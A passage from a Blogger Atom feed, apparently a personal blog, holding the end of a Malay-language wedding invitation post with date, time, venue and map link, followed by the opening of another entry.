bold;"&gt;Aman&lt;/span&gt; bermula jam &lt;span style="font-weight: bold;"&gt;12:00 tengah hari&lt;/span&gt; atau pada &lt;span style="font-weight: bold;"&gt;24/11/2007 &lt;/span&gt;&lt;span&gt;bertempat di&lt;/span&gt;&lt;span style="font-weight: bold;"&gt; No. 24, Kg. Air, KM7, Kg. Kinabutan Kecl, 91000 Tawau, Sabah&lt;/span&gt; bermula jam &lt;span style="font-weight: bold;"&gt;7:30 &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;malam&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;3. Kehadiran&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;TanSri/PuanSri, Dato/Datin, Rakan Taulan, Tuan/Puan dan Encik/Cik  adalah sangat-sangat di alu-alukan. Semoga kehadiran dan iringan doa restu para jemputan sekeluarga akan menyerikan lagi majlis ini serta di berkati Allah SWT, Insha Allah.&lt;br /&gt;&lt;br /&gt;Wabillahi Taufik Walhidayah,&lt;br /&gt;Wassalamu Alaikum Warahmatullaahi Wabarakaatuh.&lt;br /&gt;&lt;br /&gt;Peta rumah pengantin click &lt;a href="http://slash.enemies.org/i/wedding/"&gt;di sini.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-2601964053701934312?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/2601964053701934312/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=2601964053701934312' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2601964053701934312'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2601964053701934312'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2007/10/utusan-raja-sehari.html' title='Utusan Raja Sehari'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-1332202775812541290</id><published>2007-10-22T17:37:00.000+08:00</published><updated>2008-11-07T10:00:12.977+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Gulfscan/FIT khalas</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_zPPJaS3LoQM/Rxxyd2VKALI/AAAAAAAAANo/dU_AqULnxd0/s1600-h/mafi.jpg"&gt;&lt;img style
